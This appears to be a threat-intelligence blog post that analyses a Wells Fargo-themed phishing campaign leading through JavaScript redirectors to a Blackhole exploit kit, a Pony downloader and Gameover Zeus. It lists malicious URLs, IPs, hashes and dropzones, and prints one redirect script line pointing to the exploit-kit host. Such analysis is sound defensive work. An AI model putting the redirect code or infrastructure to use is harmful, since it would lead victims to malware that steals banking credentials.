WellsFargo – CEO Portal Statement & Notice Event

Subject:
CEO Portal Statements & Notices Event

URLs:
instafxrebatebandung[.]com/xJgSPZmH/index.html
neelhitech[.]com/qawcXa3B/index.html

WellsFargo-03212012

The text ‘View the details of this transaction online’ contain hyperlinks to compromised websites as shown above. These pages contains no content but only 5 JS:

muzee[.]org/aYYifF1v/js.js
renneaviamentos.com[.]br/u4G9ZTQb/js.js
nowshahr118[.]com/v08jzs2k/js.js
pabloalcalde[.]com/HdU03z00/js.js
posadaeltoreno[.]com/93aHAFsx/js.js

These javascript redirectors contain the following document.location script that send victims to a Blackhole Exploit kit at 209.59.217.101:
document.location=’hxxp://closteage.com/showthread.php?t=d7ad916d1c0396ff’;

It first droppes Pony downloader from the following location:
closteage[.]com /q.php?f=ba33e&e=2

File: readme.exe
MD5: 659382f4192ef5070016b996e94b4646
Size: 2,83,160 bytes

Pony downloader posts to its dropzone at 176.28.18.135 /pony/gate.php. It was also configured to downloads following 4 files, all of them are same Gameover Zeus payloads:

1. derya34[.]com/M7R7.exe
2. http://www.procontracts.co[.]za/dnhoLD.exe
3. alimujtaba.purelogics[.]info/Jq3v.exe
4. http://www.e-gaming[.]cz/qNrkMGD.exe

It then installs Zeus in %APPDATA% which had following properties:

File: uxnab.exe
MD5: 5d4fabfef89a31dd87834a8d714f1323
Size: 2,83,160 bytes
Other: This file is digitally signed by ‘5r6Io0OJu3L2’
Company Name: Twain Working Group
File Description: Twain.dll Client’s 32-Bit Thunking Server
File Version: 1,7,0,0
Internal Name: Twunk_32
Original Filename: Twunk_32.exe
Product Name: Twain Thunker
Timestamp: 2011:10:11 15:07:46+02:00

This Gameover Zeus payload ex-filtrated stolen data to dropzone at 188.159.215.128:26650 /index.php.
This payload had a bot id of “NR21″ cid of “3005″. Webinjects were pulled from the same proxy at 87.97.164.223:22005.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: